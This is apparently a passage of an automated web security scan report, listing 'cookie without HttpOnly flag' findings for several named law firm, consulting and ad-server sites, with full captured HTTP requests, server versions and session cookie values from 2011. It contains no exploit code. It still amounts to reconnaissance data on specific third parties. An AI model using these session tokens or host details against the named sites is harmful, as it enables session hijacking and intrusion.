18.41. http://www.rothmanconsulting.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rothmanconsulting.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rothmanconsulting.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/rothman-consulting

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:08:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11375
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCDAASCT=KFIIAFLBNFBJPJCMOMFEOCJH; path=/
Cache-control: private


<html>
<head>
<title>Rothman Consulting - a boutique investigative firm providing due diligence services to financial and investment companies and professional service firms</title>

<meta name=
...[SNIP]...
18.42. http://www.rtacpa.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rtacpa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.rtacpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CB0QFjAA&url=http%3A%2F%2Fwww.rtacpa.com%2F&rct=j&q=reedtinsley&ei=Gy_MTZmgEOO_0AGh8aD2Bg&usg=AFQjCNEw7aDzOBKqm1WipAAg6_m5llEGNw&cad=rja

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=4636a284%2D6636%2D4962%2Da561%2Dec52c395e37d; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Set-Cookie: CFTOKEN=0; domain=www.rtacpa.com; path=/; expires=Sat, 11-May-2041 02:55:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 16030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
18.43. http://www.semmes.com/attorney_search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.semmes.com
Path:   /attorney_search.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /attorney_search.asp HTTP/1.1
Host: www.semmes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Semmes%2C+Bowen+%26+Semmes&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:02:43 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 40717
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADQBBCA=LMLMMCADAIHEPBNGGAHOODAF; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<
...[SNIP]...
18.44. http://www.sleepertechnologies.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sleepertechnologies.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sleepertechnologies.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:58:41 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Connection: close
Content-Length: 19477
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAARCADB=MCGCODADMLMECKBPHGJPGMPB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<title>Baltimore Web Design by Sleeper Technologies</titl
...[SNIP]...
18.45. http://www.smithmazure.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.smithmazure.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.smithmazure.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Smith+Mazure&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:02:32 GMT
Content-Length: 10541
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQTQSAQT=DMFHDBNBPFCIMBLNCJKDIPBL; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
18.46. http://www.superlawyers.com/redir  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.superlawyers.com
Path:   /redir

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redir?r=http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&c=150_badge&i=8480c83d-644a-4fd5-9e3b-15644c36fe5e HTTP/1.1
Host: www.superlawyers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://layserfreiwald.com/attorneys.html?mode=view&AID=8

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 18:35:33 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.2
Set-Cookie: sl_session=513d8e8edf41f9d4aad37a9a268d45db; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0

18.47. http://www.sutphinblvdbid.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sutphinblvdbid.org
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sutphinblvdbid.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/url?sa=t&source=web&cd=1&ved=0CB8QFjAA&url=http%3A%2F%2Fwww.sutphinblvdbid.org%2F&rct=j&q=sutphin&ei=hTbMTdrXGYXa0QGexdHZBg&usg=AFQjCNHjkgeBTbqCyWz3U8ayHJgxS0-AuA&cad=rja

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:35:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=0337a0d0%2D25a8%2D4675%2Da982%2D6d978723c931; domain=www.sutphinblvdbid.org; path=/; expires=Sat, 11-May-2041 03:27:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.sutphinblvdbid.org; path=/; expires=Sat, 11-May-2041 03:27:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SHORTCUT IC
...[SNIP]...
18.48. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:39 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000SJ1mmU6BOCbzCEKkGgUIi9q:140i3s34m; Path=/
Keep-Alive: timeout=10, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:25 GMT;path=/
Content-Length: 60330


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
18.49. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:30 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000EomNXSy4TXZVIAszHpfxWyJ:140i3s34m; Path=/
Keep-Alive: timeout=10, max=56
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:15 GMT;path=/
Content-Length: 59570


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
18.50. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wps/portal/usa/companies/company-profile/Perkins-Coie-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:29 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwMDbz9DA89QEzdnYzMXL09XE6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-3CrMDFGk8diPkjeAAdwNND388jPTdUvyI0wyAxIVwQAvWe5xA!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000GNJvwOeybIylqfuGPV4Evvo:140i3s34m; Path=/
Keep-Alive: timeout=10, max=19
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Thu, 12-May-2011 17:25:14 GMT;path=/
Content-Length: 60146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>    
<head>
<script type="text/javascript">var _sf_startpt=(new
...[SNIP]...
18.51. http://www.wendel.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wendel.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.wendel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Wendel+Rosen&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:02:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=8682898;expires=Sat, 04-May-2041 16:02:19 GMT;path=/
Set-Cookie: CFTOKEN=65393107;expires=Sat, 04-May-2041 16:02:19 GMT;path=/
Set-Cookie: CFCLIENT_CRAZYFINGERS=personid%3D0%23;expires=Sat, 04-May-2041 16:02:19 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D8682898%26CFTOKEN%23%3D65393107%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23hitcount%3D2%23cftoken%3D65393107%23cfid%3D8682898%23;expires=Sat, 04-May-2041 16:02:19 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Set-Cookie: LB-Persist=Q7x370Drr/ddufmTEf2ps0e/58OoyB2QIE0OYO6bXUVdnTI+2FWPFqdOsT2Q9bFgo8jfK6xV+tlz5g==; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
18.52. http://www.wi-ala.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wi-ala.org
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.wi-ala.org

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 18:12:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26523397;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Set-Cookie: CFTOKEN=9900220a7385ac84-E56909CC-AAA4-E2C1-FF05B6D760509957;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523397%26CFTOKEN%23%3D9900220a7385ac84%2DE56909CC%2DAAA4%2DE2C1%2DFF05B6D760509957%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A36%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A36%27%7D%23hitcount%3D2%23cftoken%3D9900220a7385ac84%2DE56909CC%2DAAA4%2DE2C1%2DFF05B6D760509957%23cfid%3D26523397%23;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Pragma: no-cache
location: ClubPortal/wala
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8

18.53. http://www.wi-ala.org/ClubPortal/wala/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ClubPortal/wala/ HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:09:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26522775;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFTOKEN=160c8b3f842edead-E5661479-9CF0-1BCF-8A4BC5F474D9CD94;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522775%26CFTOKEN%23%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A23%27%7D%23hitcount%3D2%23cftoken%3D160c8b3f842edead%2DE5661479%2D9CF0%2D1BCF%2D8A4BC5F474D9CD94%23cfid%3D26522775%23;expires=Sat, 04-May-2041 18:09:23 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

   <title>
   Wisconsin Association of
...[SNIP]...
18.54. http://www.wi-ala.org/clubportal/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wi-ala.org
Path:   /clubportal/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clubportal/ HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.wi-ala.org

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 18:12:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=26523396;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Set-Cookie: CFTOKEN=d949761e7804a43b-E5690920-D399-841C-4C5D54C34C4AAAB5;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523396%26CFTOKEN%23%3Dd949761e7804a43b%2DE5690920%2DD399%2D841C%2D4C5D54C34C4AAAB5%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A36%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A36%27%7D%23hitcount%3D2%23cftoken%3Dd949761e7804a43b%2DE5690920%2DD399%2D841C%2D4C5D54C34C4AAAB5%23cfid%3D26523396%23;expires=Sat, 04-May-2041 18:12:36 GMT;path=/
Pragma: no-cache
location: http://www.wi-ala.org/
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8

18.55. http://www.wiggin.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wiggin.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Wiggin+and+Dana&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:02:19 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; path=/
Vary: Accept-Encoding
Content-Length: 23131


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
18.56. http://ads.keypromedia.com/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.keypromedia.com
Path:   /www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/ajs.php?zoneid=1&cb=57843501632&charset=UTF-8&loc=http%3A//www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&referer=http%3A//layserfreiwald.com/attorneys.html%3Fmode%3Dview%26AID%3D8 HTTP/1.1
Host: ads.keypromedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:38 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e4df0eecb3c9a2f30bfbfd0dce7c8633; expires=Fri, 11-May-2012 18:35:38 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/javascript; charset=UTF-8
Content-Length: 1013

var OX_bb9fd9e7 = '';
OX_bb9fd9e7 += "<"+"a href=\'http://ads.keypromedia.com/www/delivery/ck.php?oaparams=2__bannerid=3210__zoneid=1__cb=a9c05f0355__oadest=http%3A%2F%2Fwest.thomson.com%2Fstore%2Fad.
...[SNIP]...
18.57. http://ads.keypromedia.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.keypromedia.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=472&campaignid=525&zoneid=1&loc=http%3A%2F%2Fwww.superlawyers.com%2Fpennsylvania%2Flawyer%2FGlenn-A-Ellis%2F8480c83d-644a-4fd5-9e3b-15644c36fe5e.html&referer=http%3A%2F%2Flayserfreiwald.com%2Fattorneys.html%3Fmode%3Dview%26AID%3D8&cb=bfb3bcc417 HTTP/1.1
Host: ads.keypromedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html
Cookie: OAID=364dcf6e49dae059d4ab5b792b30c31c

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:35:40 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
